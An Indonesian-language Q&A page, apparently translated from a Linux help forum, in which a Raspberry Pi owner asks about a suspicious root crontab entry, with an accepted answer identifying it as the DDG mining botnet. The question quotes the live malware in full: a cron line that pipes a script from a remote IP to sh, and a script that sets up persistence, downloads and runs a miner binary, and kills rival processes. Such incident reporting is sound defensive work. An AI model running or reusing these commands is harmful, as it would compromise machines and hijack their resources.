GNU/Linux >> Belajar Linux >  >> Linux

Entri Crontab Mencurigakan Menjalankan 'xribfa4' Setiap 15 Menit?

Saya ingin menambahkan sesuatu ke file root crontab saya di Raspberry Pi saya, dan menemukan entri yang tampaknya mencurigakan bagi saya, mencari bagian-bagiannya di Google tidak menghasilkan apa-apa.

Entri crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Isi http://103.219.112.66:8000/i.sh adalah:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Pengetahuan Linux saya terbatas, tetapi bagi saya sepertinya mengunduh binari dari server Indonesia dan menjalankannya sebagai root secara teratur bukanlah sesuatu yang biasa.

Apa ini? Apa yang harus saya lakukan?

Jawaban yang Diterima:

Ini adalah botnet penambangan DDG, cara kerjanya :

  1. mengeksploitasi kerentanan RCE
  2. memodifikasi crontab
  3. mengunduh program penambangan yang sesuai (ditulis dengan go)
  4. memulai proses penambangan

DDG:Botnet Penambangan yang Menargetkan Server Basis Data

SystemdMiner ketika botnet meminjam infrastruktur botnet lain

U&L :Bagaimana saya bisa membunuh malware penambang pada instans AWS EC2? (server yang disusupi)


Linux

  1. 17 perintah Linux yang harus diketahui setiap sysadmin

  2. menjalankan perintah terhadap setiap baris dalam file teks

  3. Memeriksa Skrip Apakah Berjalan?

  1. Menjalankan Skrip Setiap Kali Kernel Baru Diinstal?

  2. Bagaimana cara menampilkan daftar proses yang berjalan Python?

  3. CronJob setiap 25 menit

  1. Bagaimana Cara Mendapatkan Tty Di Bash Yang Sedang Berjalan?

  2. Bagaimana mencegah pengguna non-root membuat entri crontab

  3. Menjalankan tugas cron di Linux setiap enam jam